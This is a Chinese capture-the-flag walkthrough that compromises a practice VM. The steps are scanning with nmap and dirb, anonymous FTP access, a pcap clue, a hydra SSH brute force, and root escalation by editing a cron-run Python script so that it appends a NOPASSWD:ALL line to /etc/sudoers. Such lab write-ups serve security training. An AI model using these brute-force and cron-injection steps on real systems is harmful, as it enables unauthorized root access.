一、主机发现

arp-scan -l

靶机ip为192.168.55.155

二、端口扫描、目录遍历、指纹识别

2.1端口扫描

nmap -p- 192.168.55.155

发现该靶机的ftp端口开放，可能能直接进行连接

2.2目录遍历

dirb http://192.168.55.155

找到了两个敏感目录

2.3指纹识别

nmap 192.168.55.155 -sV -sC -O --version-all

说明ftp可以进行弱口令进入

三、靶机网页进行信息收集，拿下低权限用户

进入靶机网页，发现只有一张图片

访问了dirb扫描出来的敏感路径，发现也没有很多信息，尝试ftp连接

弱口令：

anonymous
guest

将该文件下载到kali本机中，然后使用wireshark打开

打开后容易发现这是一个tcp三次握手过程

追踪该流，发现获取了secret_stuff.txt文件

追踪另一个流，发现需要进入该目录下查找信息

注：由于是分析其中的内容，也可以使用strings直接进行打开

strings lol.pcap 

访问该url，找到了新的信息

打开此文件，发现是32位的可执行文件

可以使用binwalk进行查看其中是不是有捆绑文件

binwalk roflmao

无捆绑文件，可以使用strings进行查看了

靶机提示需要找到这个地址才能继续进行，访问一下试试

发现有两个目录

第一个目录下的文件感觉是账号

第二个目录下的文件就一个，看文件名应该是密码

使用hydra进行暴力破解

一直爆破不成功，发现密码不是Good_job_:)，而是Pass.txt,离谱啊

hydra -L 2.txt -p Pass.txt 192.168.55.155 ssh

使用账号密码进行登陆

成功拿下低权限shell

四、定时任务提权

注：此靶机一定时间后会自动退出

使用python升级shell环境

python -c 'import pty;pty.spawn("/bin/bash")'

4.1靶机信息收集

uname -a

4.2写入定时任务进行提权

由于在tmp目录中下载的提权辅助工具被删除，想到该靶机可能存在定时任务

查找定时任务

find / -name cronlog 2>/dev/null

然后寻找该文件的位置

find / -name cleaner.py 2>/dev/null

随后查看一下该文件的内容

cat /lib/log/cleaner.py

使用vi将提权命令写入该脚本中

这个文件可以执行系统指令os.system，会每两分钟执行对目录/tmp的删除，那么我们只要把os.system()中的指令修改为：

'echo "overflow All=(All)NOPASSWD:ALL" >> /etc/sudoers'

即可相当于为overflow用户追加了最高ALL权限，等待最多两分钟后，再次运行sudo -l，即可发现overflow的用户变为了最高权限

然后启动root用户的shell

提权成功！